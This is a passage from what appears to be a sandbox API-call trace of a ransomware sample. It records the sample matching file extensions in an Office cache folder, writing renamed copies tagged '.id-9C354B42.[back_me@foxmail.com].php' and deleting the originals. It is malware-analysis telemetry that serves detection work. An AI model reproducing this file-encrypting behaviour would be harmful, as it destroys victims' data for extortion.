4 [0034.800] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.800] lstrlenW (lpString=".xlsx") returned 5 [0034.800] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.800] lstrlenW (lpString=".ppt") returned 4 [0034.800] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.800] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.800] lstrlenW (lpString=".zip") returned 4 [0034.800] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.800] lstrlenW (lpString=".rar") returned 4 [0034.800] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.800] lstrlenW (lpString=".bz2") returned 4 [0034.800] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.800] lstrlenW (lpString=".7z") returned 3 [0034.800] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.801] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.801] lstrlenW (lpString=".dbf") returned 4 [0034.801] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.801] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.801] lstrlenW (lpString=".1cd") returned 4 [0034.801] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.801] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.801] lstrlenW (lpString=".jpg") returned 4 [0034.801] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.801] Sleep (dwMilliseconds=0x64) [0034.958] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0034.958] lstrlenW (lpString="PublisherMUI.xml") returned 16 [0034.958] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0035.153] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=1450) returned 1 [0035.153] CloseHandle (hObject=0x190) returned 1 [0035.155] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml")) returned 0x2020 [0035.155] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.155] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0035.155] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.155] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.155] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0035.156] GetLastError () returned 0x0 [0035.156] ReadFile (in: hFile=0x190, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x5aa, lpOverlapped=0x0) returned 1 [0035.157] WriteFile (in: hFile=0x19c, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0035.158] ReadFile (in: hFile=0x190, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.158] WriteFile (in: hFile=0x19c, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0035.158] SetEndOfFile (hFile=0x19c) returned 1 [0035.158] CloseHandle (hObject=0x19c) returned 1 [0035.159] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.159] SetEndOfFile (hFile=0x190) returned 1 [0035.160] CloseHandle (hObject=0x190) returned 1 [0035.160] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0035.160] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml")) returned 1 [0035.160] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.160] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.160] lstrlenW (lpString=".doc") returned 4 [0035.160] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.160] lstrlenW (lpString=".docx") returned 5 [0035.160] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.160] lstrlenW (lpString=".pdf") returned 4 [0035.160] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.160] lstrlenW (lpString=".xls") returned 4 [0035.160] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.160] lstrlenW (lpString=".xlsx") returned 5 [0035.160] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.160] lstrlenW (lpString=".ppt") returned 4 [0035.160] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.161] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.161] lstrlenW (lpString=".zip") returned 4 [0035.161] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.161] lstrlenW (lpString=".rar") returned 4 [0035.161] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.161] lstrlenW (lpString=".bz2") returned 4 [0035.161] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.161] lstrlenW (lpString=".7z") returned 3 [0035.161] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.161] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.161] lstrlenW (lpString=".dbf") returned 4 [0035.161] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.161] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.161] lstrlenW (lpString=".1cd") returned 4 [0035.161] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.161] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.161] lstrlenW (lpString=".jpg") returned 4 [0035.161] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.161] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.161] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.161] lstrlenW (lpString=".doc") returned 4 [0035.161] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.161] lstrlenW (lpString=".docx") returned 5 [0035.161] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.161] lstrlenW (lpString=".pdf") returned 4 [0035.161] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.161] lstrlenW (lpString=".xls") returned 4 [0035.161] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.161] lstrlenW (lpString=".xlsx") returned 5 [0035.161] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.161] lstrlenW (lpString=".ppt") returned 4 [0035.161] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.162] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.162] lstrlenW (lpString=".zip") returned 4 [0035.162] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.162] lstrlenW (lpString=".rar") returned 4 [0035.162] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.162] lstrlenW (lpString=".bz2") returned 4 [0035.162] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.162] lstrlenW (lpString=".7z") returned 3 [0035.162] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.162] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.162] lstrlenW (lpString=".dbf") returned 4 [0035.162] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.162] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.162] lstrlenW (lpString=".1cd") returned 4 [0035.162] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.162] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.162] lstrlenW (lpString=".jpg") returned 4 [0035.162] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.162] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0035.162] lstrlenW (lpString="Proof.xml") returned 9 [0035.162] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0035.162] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=1458) returned 1 [0035.163] CloseHandle (hObject=0x190) returned 1 [0035.163] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml")) returned 0x2020 [0035.163] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.163] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0035.163] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.163] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.163] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0035.163] GetLastError () returned 0x0 [0035.163] ReadFile (in: hFile=0x190, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x5b2, lpOverlapped=0x0) returned 1 [0035.165] WriteFile (in: hFile=0x19c, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0035.166] ReadFile (in: hFile=0x190, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.166] WriteFile (in: hFile=0x19c, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.166] SetEndOfFile (hFile=0x19c) returned 1 [0035.166] CloseHandle (hObject=0x19c) returned 1 [0035.167] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.167] SetEndOfFile (hFile=0x190) returned 1 [0035.167] CloseHandle (hObject=0x190) returned 1 [0035.167] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0035.168] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml")) returned 1 [0035.168] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.168] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.168] lstrlenW (lpString=".doc") returned 4 [0035.168] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.168] lstrlenW (lpString=".docx") returned 5 [0035.168] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0035.168] lstrlenW (lpString=".pdf") returned 4 [0035.168] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.168] lstrlenW (lpString=".xls") returned 4 [0035.168] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.168] lstrlenW (lpString=".xlsx") returned 5 [0035.168] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0035.168] lstrlenW (lpString=".ppt") returned 4 [0035.168] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.168] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.168] lstrlenW (lpString=".zip") returned 4 [0035.168] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.168] lstrlenW (lpString=".rar") returned 4 [0035.168] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.168] lstrlenW (lpString=".bz2") returned 4 [0035.168] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.168] lstrlenW (lpString=".7z") returned 3 [0035.168] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.169] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.169] lstrlenW (lpString=".dbf") returned 4 [0035.169] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.169] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.169] lstrlenW (lpString=".1cd") returned 4 [0035.169] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.169] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.169] lstrlenW (lpString=".jpg") returned 4 [0035.169] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.169] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.169] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.169] lstrlenW (lpString=".doc") returned 4 [0035.169] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.169] lstrlenW (lpString=".docx") returned 5 [0035.169] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0035.169] lstrlenW (lpString=".pdf") returned 4 [0035.169] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.169] lstrlenW (lpString=".xls") returned 4 [0035.169] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.169] lstrlenW (lpString=".xlsx") returned 5 [0035.169] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0035.169] lstrlenW (lpString=".ppt") returned 4 [0035.169] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.169] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.169] lstrlenW (lpString=".zip") returned 4 [0035.169] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.169] lstrlenW (lpString=".rar") returned 4 [0035.169] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.169] lstrlenW (lpString=".bz2") returned 4 [0035.169] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.169] lstrlenW (lpString=".7z") returned 3 [0035.169] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.170] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.170] lstrlenW (lpString=".dbf") returned 4 [0035.170] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.170] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.170] lstrlenW (lpString=".1cd") returned 4 [0035.170] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.170] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.170] lstrlenW (lpString=".jpg") returned 4 [0035.170] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.170] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0035.170] lstrlenW (lpString="Proofing.xml") returned 12 [0035.170] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0035.170] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=811) returned 1 [0035.170] CloseHandle (hObject=0x190) returned 1 [0035.170] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml")) returned 0x2020 [0035.170] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.171] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0035.171] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.171] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.171] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0035.171] GetLastError () returned 0x0 [0035.171] ReadFile (in: hFile=0x190, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x32b, lpOverlapped=0x0) returned 1 [0035.172] WriteFile (in: hFile=0x19c, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x330, lpOverlapped=0x0) returned 1 [0035.173] ReadFile (in: hFile=0x190, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.173] WriteFile (in: hFile=0x19c, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0035.173] SetEndOfFile (hFile=0x19c) returned 1 [0035.174] CloseHandle (hObject=0x19c) returned 1 [0035.174] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.174] SetEndOfFile (hFile=0x190) returned 1 [0035.175] CloseHandle (hObject=0x190) returned 1 [0035.175] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0035.175] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml")) returned 1 [0035.175] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.175] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.175] lstrlenW (lpString=".doc") returned 4 [0035.175] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.175] lstrlenW (lpString=".docx") returned 5 [0035.175] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0035.175] lstrlenW (lpString=".pdf") returned 4 [0035.175] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.176] lstrlenW (lpString=".xls") returned 4 [0035.176] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.176] lstrlenW (lpString=".xlsx") returned 5 [0035.176] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0035.176] lstrlenW (lpString=".ppt") returned 4 [0035.176] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.176] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.176] lstrlenW (lpString=".zip") returned 4 [0035.176] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.176] lstrlenW (lpString=".rar") returned 4 [0035.176] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.176] lstrlenW (lpString=".bz2") returned 4 [0035.176] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.176] lstrlenW (lpString=".7z") returned 3 [0035.176] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.176] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.176] lstrlenW (lpString=".dbf") returned 4 [0035.176] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.176] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.176] lstrlenW (lpString=".1cd") returned 4 [0035.176] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.176] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.176] lstrlenW (lpString=".jpg") returned 4 [0035.176] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.176] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.176] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.176] lstrlenW 